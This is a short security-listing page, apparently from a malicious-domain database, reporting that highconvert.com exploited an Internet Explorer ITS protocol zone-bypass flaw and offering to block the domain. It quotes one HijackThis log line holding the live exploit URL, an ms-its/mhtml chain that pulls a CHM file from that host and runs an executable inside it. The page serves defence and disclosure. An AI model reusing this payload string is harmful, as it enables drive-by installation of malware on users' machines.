Skip to content

highconvert.com

submitted by Roger Karlsson

highconvert.com seems to have been exploiting the Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability, based on the following Hijackthis log entry:

O16 - DPF: {11111111-1111-1111-1111-222222222222} - ms-its:mhtml:file://d:\foo.mht!http://highconvert.com/system/users/dimpy/chmjpeg//x.chm::/open.exe

Koffix offers you the possibility to:

  1. add highconvert.com to the restricted zone
  2. add highconvert.com to the HOSTS file

The information about highconvert.com is licensed under Creative Commons Attribution 2.5 License.

Comments

No comments posted yet.

Leave a reply